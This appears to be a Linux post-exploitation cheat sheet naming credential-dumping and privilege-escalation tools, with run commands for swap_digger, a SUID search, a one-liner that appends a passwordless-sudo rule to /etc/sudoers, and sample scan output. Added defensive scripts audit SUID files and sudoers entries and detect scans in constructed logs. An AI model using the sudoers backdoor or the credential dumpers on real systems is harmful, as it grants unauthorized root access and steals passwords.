Linux Post Exploitation
Post Exploitation on Linux
Common Tools
GTFOBins - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
LinPEAS - Linux local Privilege Escalation Awesome Script (linPEAS) is a script that searches for possible paths to escalate privileges on Linux/Unix.
pspy - Monitor Linux processes without root permissions
pamspy - Credentials Dumper for Linux
SUID
Although LinPEAS also reports SUID binaries, the following find command identifies SUID files on the system directly.
find / -perm -u=s -type f 2>/dev/null
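Listing SUID files once is the offensive use of that command; the defensive use is running it on a schedule and comparing the result with a baseline, so that a SUID file that appears later stands out. The script below is an added example, not code from the original page. It uses -perm -4000, the octal equivalent of -perm -u=s, and the demo builds its own temporary directory tree and baseline file rather than touching real system paths.

```shell
#!/usr/bin/env bash
# Added example: enumerate SUID files under a directory and diff them against
# a saved baseline, so that a newly planted SUID binary shows up on the next run.

# list_suid DIR: print SUID regular files under DIR, sorted, one per line.
# -perm -4000 is the octal form of the page's -perm -u=s; stderr is discarded
# because unreadable directories are expected when not running as root.
list_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# new_suid BASELINE DIR: print SUID files under DIR that are absent from the
# BASELINE file (output of a previous list_suid run). grep exits 1 when nothing
# is new, which is a normal result rather than an error here.
new_suid() {
    list_suid "$2" | grep -vxF -f "$1" || [ $? -eq 1 ]
}

# demo_suid_audit: constructed directory tree (not a real system path) with one
# known SUID file in the baseline, one planted SUID file, and one plain file.
demo_suid_audit() {
    local tmp
    tmp="$(mktemp -d)"
    mkdir -p "$tmp/bin" "$tmp/tmp"
    printf '#!/bin/sh\necho ok\n' > "$tmp/bin/known"
    printf '#!/bin/sh\necho ok\n' > "$tmp/tmp/planted"
    printf 'not suid\n' > "$tmp/bin/plain"
    chmod u+s "$tmp/bin/known" "$tmp/tmp/planted"
    # baseline recorded before the "planted" file existed
    printf '%s\n' "$tmp/bin/known" > "$tmp/baseline.txt"
    new_suid "$tmp/baseline.txt" "$tmp"
    rm -rf "$tmp"
}

demo_suid_audit
```

On a real host the baseline would be the output of list_suid / saved right after provisioning, and the diff would be run from cron or a configuration-management check; only the planted path is printed by the demo.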
swap_digger
swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purposes. It automates swap extraction and searches for Linux user credentials, web form credentials, web form emails, HTTP basic authentication, WiFi SSIDs and keys, etc.
git clone https://github.com/sevagas/swap_digger.git
cd swap_digger
chmod +x swap_digger.sh
sudo ./swap_digger.sh -vx
mimipenguin
A tool to dump the login password of the current Linux user.
Add User as Passwordless Sudo
echo 'asuka ALL=(ALL) NOPASSWD:ALL' | tee -a /etc/sudoers
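An entry appended with tee bypasses the syntax check that visudo performs, and a NOPASSWD:ALL line is exactly what an audit of sudoers should flag. The script below is an added example, not code from the original page: it greps a sudoers-style file for rules that grant password-less sudo over every command, and runs on a constructed sample file rather than the real /etc/sudoers.

```shell
#!/usr/bin/env bash
# Added example: flag sudoers rules that grant password-less sudo to every
# command, the kind of entry the one-liner above creates.

# nopasswd_all FILE...: print non-comment lines containing "NOPASSWD:" followed
# by a command list of ALL. Matches "asuka ALL=(ALL) NOPASSWD:ALL" and
# "asuka ALL=(ALL:ALL) NOPASSWD: ALL", but not NOPASSWD rules that are limited
# to a specific command. grep exits 1 when nothing matches; treat that as a
# clean result rather than an error.
nopasswd_all() {
    grep -vE '^[[:space:]]*#' -- "$@" \
        | grep -E 'NOPASSWD:[[:space:]]*ALL([[:space:]]|$)' || [ $? -eq 1 ]
}

# demo_sudoers_audit: constructed sample file, not a real /etc/sudoers.
demo_sudoers_audit() {
    local f
    f="$(mktemp)"
    cat > "$f" <<'EOF'
# constructed sample, not a real /etc/sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
asuka ALL=(ALL) NOPASSWD:ALL
# backup ALL=(ALL) NOPASSWD:ALL
EOF
    nopasswd_all "$f"
    rm -f "$f"
}

demo_sudoers_audit
```

The demo prints only the asuka line: the deploy rule is NOPASSWD but limited to one command, and the commented-out backup rule is skipped. On a real system the function should be pointed at /etc/sudoers together with the files under /etc/sudoers.d, which sudoers pulls in through its #includedir (or @includedir) directive, and the file itself should still be syntax-checked with visudo -c, since the tee append above never validates it.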
Ping Sweep with Bash
➜ bash git:(main) bash ping-sweep.sh 192.168.1.1-254
192.168.1.1
192.168.1.4
192.168.1.5
192.168.1.2
192.168.1.7
192.168.1.8
192.168.1.15
192.168.1.30
192.168.1.14
192.168.1.24
192.168.1.12
192.168.1.22
Port Scan with Bash
Port scanning with netcat.
➜ bash git:(main) bash port-scan-nc.sh 192.168.1.1 1-5000
Scanning ports 1 to 5000 on 192.168.1.1...
[192.168.1.1] 21 (ftp) open
[192.168.1.1] 53 (domain) open
[192.168.1.1] 80 (http) open
[192.168.1.1] 443 (https) open
Simple TCP port scanning with bash.
➜ bash git:(main) bash port-scan.sh 192.168.1.1 1 5000
Scanning 192.168.1.1 (ports 1 to 5000)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
443/tcp open https
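Both scans above leave a characteristic footprint on the network: one source touching many hosts with ICMP echo requests, or one source touching many TCP ports on one host. The script below is an added example, not code from the original page, showing how a defender can pick both patterns out of iptables/nftables-style LOG lines. The log lines are constructed inline, the field names (SRC=, DST=, DPT=, PROTO=, TYPE=) follow the kernel LOG target format, and the thresholds are illustrative assumptions.

```shell
#!/usr/bin/env bash
# Added example: detect a host sweep and a port scan in kernel LOG-style lines.

# scan_sources LOGFILE MIN_PORTS: print "SRC DST nports" for every source that
# sent TCP packets to at least MIN_PORTS distinct destination ports on one host.
scan_sources() {
    awk -v min="$2" '
        /PROTO=TCP/ {
            src = ""; dst = ""; dpt = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/) src = substr($i, 5)
                else if ($i ~ /^DST=/) dst = substr($i, 5)
                else if ($i ~ /^DPT=/) dpt = substr($i, 5)
            }
            if (src != "" && dst != "" && dpt != "") ports[src " " dst " " dpt] = 1
        }
        END {
            for (k in ports) { split(k, p, " "); n[p[1] " " p[2]]++ }
            for (k in n) if (n[k] >= min) print k, n[k]
        }' "$1"
}

# sweep_sources LOGFILE MIN_HOSTS: print "SRC nhosts" for every source that sent
# ICMP echo requests (TYPE=8) to at least MIN_HOSTS distinct hosts.
sweep_sources() {
    awk -v min="$2" '
        /PROTO=ICMP/ && /TYPE=8/ {
            src = ""; dst = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/) src = substr($i, 5)
                else if ($i ~ /^DST=/) dst = substr($i, 5)
            }
            if (src != "" && dst != "") hosts[src " " dst] = 1
        }
        END {
            for (k in hosts) { split(k, p, " "); n[p[1]]++ }
            for (k in n) if (n[k] >= min) print k, n[k]
        }' "$1"
}

# write_sample_log FILE: constructed log. 192.168.1.50 pings .1 through .12 and
# then probes eight ports on .1; 192.168.1.20 is ordinary traffic.
write_sample_log() {
    local f="$1" i
    : > "$f"
    for i in 1 2 3 4 5 6 7 8 9 10 11 12; do
        echo "kernel: [FW] IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.$i PROTO=ICMP TYPE=8 CODE=0" >> "$f"
    done
    for i in 21 22 23 25 53 80 110 443; do
        echo "kernel: [FW] IN=eth0 OUT= SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=40000 DPT=$i SYN" >> "$f"
    done
    echo "kernel: [FW] IN=eth0 OUT= SRC=192.168.1.20 DST=192.168.1.1 PROTO=TCP SPT=50123 DPT=443 SYN" >> "$f"
    echo "kernel: [FW] IN=eth0 OUT= SRC=192.168.1.20 DST=192.168.1.3 PROTO=ICMP TYPE=8 CODE=0" >> "$f"
}

demo_scan_detection() {
    local f
    f="$(mktemp)"
    write_sample_log "$f"
    echo "port scans (>=5 distinct ports on one host):"
    scan_sources "$f" 5
    echo "host sweeps (>=8 distinct hosts pinged):"
    sweep_sources "$f" 8
    rm -f "$f"
}

demo_scan_detection
```

The counts are over distinct ports and hosts rather than packet totals, so retries from a legitimate client do not inflate them; in production the thresholds would be tuned to the network and the input would be a time window of the firewall log rather than a whole file.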